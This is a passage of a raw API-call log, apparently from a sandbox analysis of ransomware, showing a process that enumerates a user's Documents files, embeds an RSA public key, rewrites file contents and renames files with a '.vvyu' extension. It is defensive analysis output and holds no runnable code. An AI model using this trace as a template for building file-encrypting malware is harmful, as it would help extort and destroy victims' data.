WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xa3ed, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xa3ed, lpOverlapped=0x0) returned 1 [0197.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.226] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa3f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.226] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.234] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.234] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.234] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.234] CloseHandle (hObject=0x584) returned 1 [0197.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0197.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0197.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0197.239] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\83P1PAX.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\83p1pax.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\83P1PAX.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\83p1pax.xlsx.vvyu")) returned 1 [0197.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.243] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0197.245] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec391a60, ftCreationTime.dwHighDateTime=0x1d89923, ftLastAccessTime.dwLowDateTime=0x927e9050, ftLastAccessTime.dwHighDateTime=0x1d8a642, ftLastWriteTime.dwLowDateTime=0x927e9050, ftLastWriteTime.dwHighDateTime=0x1d8a642, nFileSizeHigh=0x0, nFileSizeLow=0x30c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BZhLiohmIvg2H0_PVVuu.pps", cAlternateFileName="BZHLIO~1.PPS")) returned 1 [0197.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0197.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.246] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\BZhLiohmIvg2H0_PVVuu.pps") returned=".pps" [0197.246] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\BZhLiohmIvg2H0_PVVuu.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\bzhliohmivg2h0_pvvuu.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.247] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=12481) returned 1 [0197.247] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.250] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x309b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.250] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.254] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.254] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x30c1, lpOverlapped=0x0) returned 1 [0197.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.255] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0197.256] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.256] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.256] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.256] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.256] GetLastError () returned 0x0 [0197.256] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.256] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0197.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.257] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.257] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.257] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30c0) returned 0x2af5168 [0197.257] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea698 [0197.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0197.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea6e0 [0197.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0197.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.258] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6770 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6758 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0197.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.261] GetCurrentThreadId () returned 0x5d8 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af26f0 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.261] GetCurrentThreadId () returned 0x5d8 [0197.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6770 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67d0 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67e8 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6788 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0197.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6758 [0197.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.267] HeapFree (in: 